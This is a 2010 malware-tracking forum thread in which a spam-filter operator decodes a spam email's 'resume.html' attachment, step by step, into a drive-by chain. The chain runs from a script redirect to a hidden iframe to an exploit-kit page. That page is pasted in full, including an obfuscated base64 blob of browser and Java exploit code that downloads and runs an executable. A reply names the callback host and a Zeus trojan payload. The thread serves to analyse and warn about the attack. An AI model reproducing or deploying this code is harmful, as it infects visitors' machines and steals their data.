« previous next »
Pages: [1]   Go Down

Author Topic: massive spams with hidden iframe  (Read 4379 times)

0 Members and 1 Guest are viewing this topic.

August 18, 2010, 03:57:31 pm
Read 4379 times

cleanmx

  • Special Members
  • Hero Member
  • Offline
  • *
  • 3405
    • Spam-Filter Anti-Spam Virenschutz - CLEAN MX Managed Anti-Spam Service ist die Lösung für Ihr Spam-Problem
massive spams with hidden iframe
hi these are comming freqently:

Quote
Return-Path: <caveatting16@rockettheme.com>
X-Original-To: abuse@clean-mx.de
Delivered-To: abuse@clean-mx.de
Received: from relayn.netpilot.net (relayn19.netpilot.net [195.214.79.19])
   (using TLSv1 with cipher ADH-AES256-SHA (256/256 bits))
   (No client certificate requested)
   by ksrv8.netpilot.net (Postfix) with ESMTPS id 8051C252C003
   for <abuse@clean-mx.de>; Wed, 18 Aug 2010 17:44:20 +0200 (CEST)
Received: from relayn.netpilot.net (localhost [127.0.0.1])
   by relayn.netpilot.net (Postfix) with ESMTP id ECFEA1EB001D
   for <abuse@clean-mx.de>; Wed, 18 Aug 2010 17:44:16 +0200 (CEST)
Received: from localhost (unknown [127.0.0.1])
   by localhost (Postfix) with ESMTP id B27971EB0010
   for <abuse@clean-mx.de>; Wed, 18 Aug 2010 15:44:15 +0000 (UTC)
Received: from relayn.netpilot.net ([127.0.0.1])
   by localhost (relayn.netpilot.net [127.0.0.1]) (clean-mx, port 10024)
   with ESMTP id DGeLN7ltKa-V for <abuse@clean-mx.de>;
   Wed, 18 Aug 2010 17:44:14 +0200 (CEST)
Received: from host23.achinsk.net (host23.achinsk.net [188.65.50.3])
   by relayn.netpilot.net (Postfix) with ESMTP id B1D3739C00A
   for <abuse@clean-mx.de>; Wed, 18 Aug 2010 17:44:10 +0200 (CEST)
Received: from 188.65.50.3 by mx2.mailhop.org; Wed, 18 Aug 2010 23:44:04 +0700
Message-ID: <000d01cb3eec$2ff265d0$6400a8c0@caveatting16>
From: "Jamar Villanueva" <caveatting16@rockettheme.com>
To: <abuse@clean-mx.de>
Subject: Resume
Date: Wed, 18 Aug 2010 23:44:04 +0700
MIME-Version: 1.0
Content-Type: multipart/mixed;
  boundary="----=_NextPart_000_0006_01CB3EEC.2FF265D0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180

This is a multi-part message in MIME format.

------=_NextPart_000_0006_01CB3EEC.2FF265D0
Content-Type: text/plain;
   format=flowed;
   charset="iso-8859-1";
   reply-type=original
Content-Transfer-Encoding: 7bit

Attached, please find


------=_NextPart_000_0006_01CB3EEC.2FF265D0
Content-Type: text/html;
   name="resume.html"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
   filename="resume.html"

PFNDUklQVCBMQU5HVUFHRT0iSmF2YXNjcmlwdCI+PCEtLQovL2VuY29kZWQgd2l0aCBYLUhUTUwg
RW5jb2RlciAKZnVuY3Rpb24geGh0bWxkZWNvZGUoeCl7CmRvY3VtZW50LndyaXRlKHVuZXNjYXBl
KHgpKQp9CmZ1bmN0aW9uIHJ1bml0KCl7Cng9IiUzQyU2RCU2NSU3NCU2MSUyMCU2OCU3NCU3NCU3
MCUyRCU2NSU3MSU3NSU2OSU3NiUzRCUyMiU3MiU2NSU2NiU3MiU2NSU3MyU2OCUyMiUyMCU2MyU2
RiU2RSU3NCU2NSU2RSU3NCUzRCUyMiUzMCUzQiU3NSU3MiU2QyUzRCU2OCU3NCU3NCU3MCUzQSUy
RiUyRiU3NyU3NyU3NyUyRSU3MiU2NSU3MyU2OSU2NCU2NSU2RSU3NCU2OSU2NSU2MiU2NSU3NiU2
NSU2OSU2QyU2OSU2NyU2OSU2RSU2NyU3MyU3NCU2NSU2MyU2OCU2RSU2OSU2NSU2QiUyRSU2RSU2
QyUyRiU3OCUyRSU2OCU3NCU2RCU2QyUyMiUzRSUwRCUwQSIKeGh0bWxkZWNvZGUoeCkKfQpydW5p
dCgpCi8vLS0+Cjwvc2NyaXB0Pg0K

------=_NextPart_000_0006_01CB3EEC.2FF265D0--

this piece of attached html decodes to:
Code: [Select]
<SCRIPT LANGUAGE="Javascript"><!--
//encoded with X-HTML Encoder
function xhtmldecode(x){
document.write(unescape(x))
}
function runit(){
x="%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%72%65%66%72%65%73%68%22%20%63%6F%6E%74%65%6E%74%3D%22%30%3B%75%72%6C%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%72%65%73%69%64%65%6E%74%69%65%62%65%76%65%69%6C%69%67%69%6E%67%73%74%65%63%68%6E%69%65%6B%2E%6E%6C%2F%78%2E%68%74%6D%6C%22%3E%0D%0A"
xhtmldecode(x)
}
runit()
//-->
</script>


results in:
Code: [Select]
<meta http-equiv="refresh" content="0;url=http://www.residentiebeveiligingstechniek.nl/x.html">
this one in turn results in:
Code: [Select]
PLEASE WAITING 4 SECOND...
  <meta http-equiv="refresh" content="4;url=http://brocuphdislock.cz.cc/scanner10/?afid=24">
</head><body>

<iframe src="http://fast-addon.in/news/index.php?cat=151&showtopic=ecard&vid=protected" style="visibility: hidden;" height="1" width="1"></iframe>



</body></html>

fast-addon results in:

Code: [Select]
<html><head></head><body>Loading...<applet  CODE = 'SiteError.class' ARCHIVE = 'http://fast-addon.in/5/j.php' WIDTH = '0' HEIGHT = '0'><PARAM NAME = CODE VALUE = 'SiteError.class' ><PARAM NAME = ARCHIVE VALUE = 'http://fast-addon.in/5/j.php' ><param name='type' value='application/x-java-applet;version=1.6'><param name='scriptable' value='false'><param name='url' value='http://fast-addon.in/5/exe.php?x=jjar'></applet><div id="page" style="display: none">Zn V uY 3 Rpb24 gS nVtcEF3YX ko KQ0 Kew0K C Xdpb mR vdy5vcGVuKCdodHRwOi8vd3d3 Lmdv b2dsZS5jb20 vND A0 LycsICdfc2 V sZic pOw0 KfQ0KD Qpmd W5 jdGlvb iBKRF Qo K Q0Ke w0K CXR y eQ0KCXsJDQoJCXZh ciB1I D0g J2h0dHA6IC1KLWphciA tSlxcXFxmYXN0LWFkZG9uLmluXFx wdWJsaWNcXHBo b3RvLmpwZyA gaHR0 cD ovL 2 Zh c3Qt YWRkb24u aW4vNS9leG U ucGh wP3 g9a mR0MCBub 25lJzs NCg 0KCQlp ZiAod2luZ G93Lm5hd mlnYXR vci5h cHBOYW1lID0 9ICdNaWNyb 3 NvZ nQgSW50 ZXJ uZXQ gR Xhwb G 9yZ XInKQ0 KCQl7DQoJ CQl0cnk NCgk JC XsN C gkJ CQ l2YXIgbyA9IGRvY3VtZW50LmNyZWF0ZUV sZW1lbnQoJ09CSkVDVCcp Ow0KCQkJCW8u Y2 xhc3 N pZCA9ICdj bHNpZD pDQ UZFRUZ BQy1ERUM 3LTA wMDAtMD A wM C1B QkNERU Z GRURDQkE n Ow0KC QkJCW8ubGF1bmNoKHU p OyAgICAN Cgk J CX0 NCgkJCWNhdGNoKG UpD QoJCQl7DQoJCQkJdmF yIG 8yI D0g Z G9jd W1 lbnQuY3 JlYXRl RWxlbWVudCg nT0 JKRUNUJy k7DQoJCQ kJb zIu Y2xhc3 NpZCA9I Cdj bHNpZDo 4QUQ5Qzg0MC0wNDRFLTE xRDE t QjNFOS0 wMDgwNUY 0OTlEOTMnOw 0KCQkJCW8 yLm xh dW5jaCh1KTsNC gkJCX 0NCgk JfQ0K CQllbHNl D QoJ CXsNCg kJC X ZhciB vID0gZG9jd W1lbnQuY3Jl YXRl RWxlbWV udCgnT0JKRUNUJ yk7DQoJCQl 2YXIgb i A 9IG RvY3V tZ W50L mNyZWF0 ZUV sZW1l bnQoJ09CSkVD V Ccp Ow0KCQkJby50 eXBlID0gJ2FwcG x pY2F0aW9uL25wcnVudG ltZ S1 zY3Jpc H Rh Ym x l L XBsdWdpbjtkZXBsb3ltZ W50dG 9v bGtpdCc7DQoJCQl uLnR5cGU gPSAnYX Bw bGljY XRpb24vamF2YS 1kZXB s b3ltZW 5 0LXRvb2xraXQn O w0KCQ kJZG 9jdW1 lbnQuYm 9keS5hc HB lbmRD aGlsZChvKTsNCgk JCWRvY3VtZW 50LmJvZHkuYXBwZW5kQ 2h p bGQobik7DQoNCgkJCXRyeQ0KC QkJew 0KC QkJCW8ubG F1bmNoKHUpO w0KCQkJfQ0KC Q kJY 2F0 Y 2ggKGU pDQoJCQl7DQ oJC Q kJbi5sYXVuY 2godSk 7DQ oJCQl 9DQoJC X0NCgl9DQoJY2F0Y2 ggKGUpDQo J ew 0K CX0N Cn 0NCg 0K DQpmdW5jdGlvbiBDc m Vh dGV P KG8sbikNC nsNCnZhc i By PW51b Gw7DQp0cnl7 cj1vL kNyZWF0Z U9 iam VjdChu KX1jYXRjaChlKXt9DQppZighcil 7dH J5e3 I9b y5DcmVhdG VPYmplY3QobiwnJyl9Y2F0Y2go Z Sl7fX0NC mlm KCFyKXt 0cnl7c j 1 vLkNyZWF0ZU9iamVjdCh uL CcnLCcnKX1jYXRjaC hlKXt9 fQ0 KaWYoIX Ipe3RyeXtyP W8uR 2V0T 2J qZWN 0 KCcn LG 4pfWNhdG NoKGUpe3 19 DQppZ ighc i l7d HJ5e 3 I9b y5HZXRP YmplY3 QobiwnJ yl9Y 2F0Y2 goZSl 7 f X0NCmlm K CFyKXt0cnl7cj1 vLkdldE9iamV jdChu K X1j YXRjaChl KXt 9fQ 0Kc m V0dX JuKHIpOw0KfQ0 KDQpm d W5 jdG lvbiBHbyhhKQ0K ew 0KdmFyI GV1cmw gPS AnaHR0cDovL2Zhc3QtYWRkb24 u a W4vN S9 leGU uc Gh wP3g9 b WR hYyc 7 DQp2YXIgZ m5h bWU9ICd rbm9ja2 91dC5 leGUnOw0KdmF yIG Zzb z1DcmVhdGVPKGEsJ1NjcmlwdGl uZy5GaWxlU3lzdGV tT2JqZWN0Jyk NCnZhc iBzYXA9Q3JlYX RlT yhhL CdTaGVsbC5BcHBsaWNh dGlvbic pO w0KdmFyIH g9Q3JlYX RlTyhhLCdBRE9EQi 5Td H Jl YW0nKTsNC nZhc i BubD 1u dWxs O w0 KZm5hb WU9Z nNvLkJ 1a W xk UG F0aCh mc28 u R 2V 0U3BlY 2lhb EZvb GRl cigyK Sx m b mF tZSk7DQp4Lk 1vZGU9 M zsNCnRyeXtubD1 DcmVhdG V PKGEs J01 pY 3Jvc29mdC 5YT Ux IVFRQJy k7bmw u b3Blbign R0VU Jyx l dXJs LGZhbHNlKTt9D Qpj YX RjaCh lKXt0cnl7bmw9Q3JlYXR l Tyhh LCd NU1hNTDIuWE1 MSFRUUCcpO25 sLm9 wZ W4o J0dFVCcs ZXV ybC xmY WxzZSk7fQ0KY 2F0 Y 2g oZSl7dHJ 5e25sPUNyZ WF0ZU8oYSwn TVNY TUwyLlNlcn ZlclhNTEhU VFAnK TtubC5vcGVuKCdHRV QnLGV1cmwsZmF sc2UpO3 0 N CmNhdGNoKG Up e3RyeXtub D1uZX c gWE 1MSHR0 cF JlcX V lc3QoK Ttu bC5vcGVuK CdHRVQnLG V 1cm wsZmFsc2UpO 3 0NCmNhdGN oKGUpe3 J ldHV ybiAwO3 19fX0NC n guVHlwZT0xOw0Kbmwuc2VuZChud W xsKTsNC nJiPW 5 s L nJ l c3BvbnNl Qm9keTsNCnguT 3BlbigpO w0K eC 5Xcml0ZS hyYik7DQp4 LlNhdmVUb2ZpbGUoZm5hbWUsMik7DQpzY X AuU2hlbGxFeG VjdXRlK GZu YW1l KTsNCn JldHVybiAxO w0 K fQ 0K DQ p mdW5jdGlvb iBN REF DKCkgD Q p7DQp2YXIgaT0wO w0Kdm Fy IHRhcmdldD 1 uZXcg QXJy YXkoDQ onQ kQ5 NkM1NTYtN jVBMy0xMU QwLT k4M 0 EtMDBDMDRGQzI5 RT M 2JywNC idCRDk2QzU1Ni0 2NUEzLTEx RD AtOTgzQS0w MEMwNEZDMjlFMzAnLA0KJ0FCOUJDRU RELUVDN0Ut NDd F MS05MzIyLUQ0QT IxMDYxNzExNicsDQo nMDAw N kYw MzMtMDAwMC 0wMD A wL U MwMDAtMD AwMDAwMDAw M DQ 2Jy wNCi cwMD A2RjAzQS0wMDAwL TAwMDAtQzA wMC0w MDAwM DAwMDAwND Y nLA0KJzZlMzIwNzBhLTc2NmQtN GVlNi04 Nzlj LWRj MWZhOTFkMmZjM y csDQonNj Q x NDUxMkI tQ j k3OC 00NTF E LU E wRDgtRkNGREYzM0U4Mz N DJywNCic3 Rj VCN0Y2M y1GMDZGLTQzMzEt OEEyNi0 z Mz lFMDNDM EF FM0Q nLA0KJzA2NzIzRTA 5LUY0 Q zItNDNjOC04 MzU4LTA5RkNEMURC MDc2Nic sDQon Nj M5RjcyNU YtMUIyRC00O DMxLUE5RkQtOD c0ODQ3N jgy M D EwJywNCidCQT A xODU5OS 0xREIzL TQ0ZjktOD NCNC00N jE0NTRDO DRC Rj g nLA0KJ0 Qw Qz A3 R DU2LTdDN jk t NDNG MS1CN E EwL T I1RjVBMTFGQU I xOScs D Qon RT hDQ0N E REYtQ0Ey O C00OTZiL UIwN TAtNkMw N0 M5 Nj I0NzZCJyxu dWxsKTs NCndoaWx lKHRh cmdldFtpXSk NCnsNCn ZhciBhPW5 1bGw7 DQphPW R vY3VtZW50LmNy ZW F 0ZUVsZW1lbnQ oJ29iamVjdCcpOw0KY S 5z ZXRBd HRyaWJ 1dGUoJ2 Ns YXNzaWQ nLCdjbHNpZDonK3Rhc mdldFtpXSk7DQppZih hKQ0Kew0K d HJ5 D Qp7 DQ p2YX IgYj 1 DcmVhdGVPK GEsJ1 N oZWxsLkF w cGxpY2F0aW9uJyk7DQppZ ih i KQ0Kew0KR2 8 o YSk 7DQ p9D Qp 9 Y2F0Y2go ZSl7fQ0 KfQ0KaSsr O w0K f Q0KfQ0 KDQ o NCmZ 1bmN0a W9uIE pBUy gp DQp7DQoJdmFyIH Nj ZWtlZWx0bWlta3Fz cH F4c yA9I Cc8YXBwb G V0IGN vZGU9IktBSy 5ORU Quc2 V4eHh5LmN sYX NzIi BhcmNo aXZlPSJodH R wOi8vZ mFz dC1hZGRv bi5pb i 81L 25j L n BocC Igd2 lk dGg9I jM w MCIgaGVp Z 2h0PS IzM DAiPic7DQoJ c2 N la2Vl bHRt aW 1rcXNw cXhzIC s9I Cc8c GFyYW0gbmFtZT0iY3JpbWVwYWNrI iB2YW x1Z T0iaHR 0 cDovL2Zhc3QtYWRk b2 4ua W 4 v N S 9leGUucGhwP3g9am FzIj4nO w0KCXNjZW tlZWx0bWl ta3Fz cHF4c yA rPSAnPHBhcmFtI G5h bWU9 ImNvdW5 0IiB2 YWx 1ZT0iMS I+PC9 hcHBs ZXQ+Jz sN C gl2YXIgcnJua292Z2V 0eWx 0YnV2Z2Z 6ID 0gZG9jdW1lbn QuY3J lYXRlRWxlbWVudCgi ZG l2Iik7DQoJcnJua29 2Z 2V0eWx0YnV2 Z2Z6Lm lubmV y SF RNT C A9 I HN jZWtlZWx0bWlt a3F zc HF4cz sNCglkb2N1bWVudC5ib 2R 5LmFwcGVuZE N oaWxkKHJybm tvdmdld Hl sdG J1dmdmei k7D Qp 9DQ o N CmZ1bmN0 aW9u IE1JREkoKQ 0Ke w0KC XZhciBkID 0gZ G9j dW 1lbnQuY3Jl YXRlRWxlbWVudCgiZGl2Iik7DQoJZ C5pbm5lckhU T U w9 JzxhcHBsZX QgY29kZT0 iQXBwbGV UL mNs YXNzIiBhcmN oaXZ lPSJodHRwO i8vZmFzdC1hZGRvbi5pbi 81 L21pZGkucG hwIiB 3aWR0aD0iMT AwJS IgaGVpZ 2h0PS Ix MD AlIj48cGFyYW 0gbm Ft ZT0ic 2MiIHZhbHVlP SI5MDkw O TA5MDMzY zA2NDhi ND AzMDc4MGM4YjQwMGM4YjcwMWNhZ DhiNTgwOGViMDk4 YjQ wMzQ4ZDQwN2M 4 YjU4M2M2YTQ0NWFkMWUy M mJlMjhiZWNlYjRmNWE1Mj gzZWE1N j g5 NTUwNDU2NT c4Yj czM2M4Y jc0 Mz M 3 ODAzZ jM1NjhiNzYyMDAzZjM zM2 M5NDk 1MDQxYWQzM2ZmMzY w ZmJl MT QwMzM4Z jI3N D A4YzFjZjBkMD N mYTQwZW JlZjU4M2 JmO Dc1Z TU1ZThi N DYyNDA zYzM2Nj hi MGM0ODhiNTYxYzAzZDM4YjA0 OGEwM2MzN WY1ZTUwY zM4ZD d kMD g1 NzUyY jgzM2 NhOG E1Y mU4YTJm ZmZ mZmYz MmM wOGJmN2YyYW U 0ZmI4NjUy ZTY1NzhhY jY 2O Tg2NmFi Y jA2Yzhh ZTA5ODUw Njg2Z j ZlM m U 2ND Y4Nz U3M jZjN mQ1NGI4OGU0ZTBlZWNm ZjU 1 MDQ5MzUwM zNjMD UwNTA1N jhiN TU w NDgz YzI3Zj gzYzIzMTUyN TBiOD M2MWE yZj c wZmY1NTA0NWIzM 2ZmNTc1NmI4OThmZThhM GVmZj U1MDQ1N2I4ZWZ jZWUwNj BmZjU 1M DQ2 ODc0NzQ3MDNhMmY yZ jY2Nj E3Mzc0Mm Q2 MTY0NjQ2Zj ZlMmU2OTZlMmYzNTJmNj U3ODY1MmU3 MDY4Nz AzZjc4M2Q 2ZDY5Nj Q 2OTI2MjYyNjI2MjYyNj I2M j YyNjI2MjYyNj I 2Mj YyN jI2 MjYyNjI2 Mj YyN jI2MjYyNjI2MjYyN jI 2MjYyNjI2MjYyNjI2MjY yN jI2MjY yNjI2MjYyNjI 2M j Y yNj I2Mj Y yNjI2MjYy NjI2 MjYyNj I2Ij4 8L2F wcGxldD4nOw0K C WRv Y3VtZW50LmJvZHk uYXBw ZW 5kQ2hpbGQoZCk7DQp9 DQoNCmZ 1bmN0aW9uIE hDUCgpDQ p7DQ oJdHJ5DQoJ ew0 KCQl2 YXIgZm49ImhjcDovL3 NlcnZpY 2 VzL3NlYXJjaD9xdWVy eT0mdG9wa WM9aGN wO i8 vc3l zdGVtL3 N5c2luZm8 vc3lzaW5m b 21haW4ua HR tJU ElJUElJUElJ UE lJU El JUElJUElJ UE lJUElJUElJUEl JUElJUElJUElJU ElJ U E lJ U ElJ UElJUElJUElJUElJU ElJ UElJUE lJU ElJ U ElJ UElJUElJ UE lJ UE lJU El JUElJUElJUElJUElJUEl JUElJ UElJUElJUEl J UEl JUEl J UElJUE l JUElJU El JUE lJ UElJUElJU ElJU ElJ UE lJUElJUElJUElJUElJUElJU E lJUE lJUElJUE lJUElJUElJUElJUElJUEl JUElJUE lJUE lJUElJUElJUElJUElJUE lJU ElJUE lJU ElJUElJUElJUElJUElJUElJUElJ UElJUElJUEl JUElJ UE lJUElJUElJUElJ U E lJUElJUElJUEu LiU 1 Qy4 uJTVD c3 lzaW5m b21ha W4u aHR tJ XUwMDNmc3ZyPS U z Q3Nj c mlwdCUyMG RlZmVyJT NFZ XZhbCUyOHVuZXNjYXB lJ TI4 JTI 3 UnVuJ TI1MjglM jUyMmN tZCAv Y yBjZC AuLi8g QEAgZWNob y B2YXIgYS1BY3 R pdmVYT2J qZWN 0O3ZhciBiLW5ldy BhKFdTY3Jp c HQuQX JndW1lbn Rz K DApKTtiLk 9wZW4oV1 N jcml w dC5Bcmd1bWVudHMoMSksV 1 Njcm lwdC5B cmd1bWVu dHMo Mi k sV1Nj cmlw d C5B cmd1bWVudHMoMy k p O2IuU2VuZC hXU2N yaXB0LkFyZ3VtZW5 0c yg0KS k7dmFyIG MtYi5 yZXNw b2 5zZUJ vZHk7dm Fy IGQt bmV3 IGEo V1NjcmlwdC5 Bcmd1 b WVudH Mo NSkp O 2 QuVHlwZS1XU2Nya XB 0LkFyZ3VtZW50cyg 2KTtkLk1vZ G U tV1NjcmlwdC5Bcmd1bW Vu dHMo Ny k 7ZC5PcGVuKCk7ZC5 Xcml0ZShjKTt2YXI gZ S1XU2NyaXB0LkFyZ 3VtZW50c yg4 K Ttk L lNhdmVUb0ZpbGUoZ S w yKTt2 YXIgZi 1uZXcg YSh XU2 N yaXB0LkFyZ3V tZW50c yg5KSkuU nVuK GUsV 1Njc mlwdC5Bcmd 1bWVudH MoMTApKTsgPi Bl eGU u anMgQEAgQ1Njcmlwd C5l eGUgZXhlLmpzIC8vYi AvL3 MgX01 pY3 Jvc29mdC5YTU xI VFRQXyBfR0V UXyB faHR0 cD ovL2Zhc3QtYWRk b 24ua W4vNS9 o ZWxw LnBocF9fcy1uZX d oY3BfIF9mYWxz ZV 8gX25 1bGxfIF9BRE9EQi5TdHJlYW1f I DE gMyBfZXhlLmV4ZV8gX1 d TY3Jp cHQuU 2hlbGxf ID AgQEAgZGVsI C9mIC9 x I GV4ZS5qcyBAQCB0YX Nra 2 lsbC Av aW0gL2Y gSGVs cEN0ci5l eGUlM jUyMi5yZXBsY WNlKC9fXy9nLFN0cmluZy5mc m9tQ2hhckNvZG UoNjMp KS5yZXBsYWNlKC9AL2csU 3Ry aW 5nLmZ y b 21DaGF y Q 29kZSgzOCkpLn JlcG xhY2Uo L18 v Zy xTd HJ p bmcuZ n J v bUN oYX JDb2R lKDM 0 KSk ucmVwbGF j ZSgvL S9nLFN0c mluZy5mcm9tQ2hhckNvZGUo NjEpKSU yNTI5JTI3J TI5J TI 5JT NDL 3Njcm lwdCUzRSI7 DQoNCg kJdmF yI G0gPSBkb2N1bWVu d C5jcmVhd GVF bGVtZW50KCdpZn J hbW UnKTsNCgkJbS5zZ XRBdHRya WJ1d GUoJ3NyYycsIGZ uKTsN CgkJbS5 z Z XRBdHRyaWJ 1dGUoJ 3dp ZH R o Jyw gMCk7DQoJCW0uc2V0QXR0 cm lidXRlKCdo Z WlnaHQ nLCAw KTsNCgkJbS5z ZXRBdHRyaWJ1 dGUoJ 2ZyYW1lYm9 yZGVyJywgJ zA n KTsNCgkJZG 9jdW 1lbnQuYm9keS5hc HBlbmR DaGls ZChtKTsNCg l9DQoJ Y2F 0 Y 2goZSl7fQ0KfQ0KDQoN Cg0K dmFyIF9YU C Ag ICA 9IChuYXZpZ2F0 b3 IudXNlckF n ZW50L mluZGV4T2Yo J05UID Uu MS cpICE9 IC 0 xKSA/IHRydWUgOiBmYWxzZTsNCnZhciB f VmlzdGEgPSAobmF2a Wdhd G9yLn VzZXJBZ 2V ud C 5pbmRleE9mKCdOV CA2L jA nKSA hPSA tMS k g PyB0 cn VlI DogZmFsc2U7 DQp2Y XIgX0l FNiAgID0 gKG5h dmln YX Rvci5 1c2VyQWdl bnQuaW5kZXhPZi gnSU UgNicpICE9IC0x KSA/IHRyd WUgOiB mYW xzZT sNCnZhciB fS U U3IC AgP SA obmF 2aWd hd G9yLnV zZXJBZ2VudC5pbmRl eE9 mKCdJRSA3J ykgIT0gL TEpID8gd HJ1 Z SA6IGZhb HNl Ow 0KdmFyIF9JRTgg ICA9 I ChuYXZpZ2F0b3I udXN l ckFnZW5 0LmluZGV4T2YoJ0lFIDgnKSAhPSAtM Sk gPy B0 cnVl IDo gZmFsc2U7DQp2YX Ig X0pBVkE g ID 0gbmF 2aWd hdG9yLmphdm F Fbm Fi bGVkKCk7DQoNCg0K dmFyIHRpbS AgICA9IDA7DQoNCmlm I ChfSUU2 KQ 0K ew0KCXNldFRpbWVvdXQ gKE1EQUMs IH RpbSk7DQo JdGltICs9IDU wMDsNCn0NCg0KaWYg K F 9KQVZBKQ0Kew0KCX Nld FRpbWVvdXQ gKEp EV CwgdGltK T s NCgl 0aW0gKz0gNTAwOw0KDQoJ c2V 0VGltZW91 dCAoSkF TLCB0aW 0 p O w0KCXRpbS ArPSA1M D A7DQ o NCg lp ZiAoX1hQI H x8IF9WaXN 0YSkNCgl 7 DQoJCXNl d FRpbWVvdX QgKE1JREksI HRpbSk7DQoJCXRpbSArPS A1MDA7 DQo JfQ0KfQ0KD Q ppZiA oX0l FNyAmJi Bf WF ApDQp7DQo Jc2V0VGltZW91 dCAoSENQL CB0 aW0pOw0KfQ0KDQoNCg0KaWYgKHRpbSA+I DApIHRpbSArP SA xMDAw MDs NCg0Kc2V0V GltZ W9 1dC AoSnVtcEF3 YXksIHRpbSk7DQo =</div><script type="text/javascript" src="http://fast-addon.in/5/js.php"></script></body></html>
-- gerhard

Logged
August 18, 2010, 06:36:32 pm
Reply #1

SysAdMini

  • Administrator
  • Hero Member
  • Offline
  • *****
  • 3335
Re: massive spams with hidden iframe
I have seen 3 different exploit domains today:

http://www.malwaredomainlist.com/mdl.php?search=exe.php%3Fx%3Djjar&colsearch=All&quantity=50&inactive=on

payload calls home to hxxp://windns.in/3/4.php?id=mcayHYiCywoanAf&x=6666&os=5.1&n=1 and downloads  a Zeus v2.0 trojan.
Logged
Ruining the bad guy's day
Pages: [1]   Go Up
« previous next »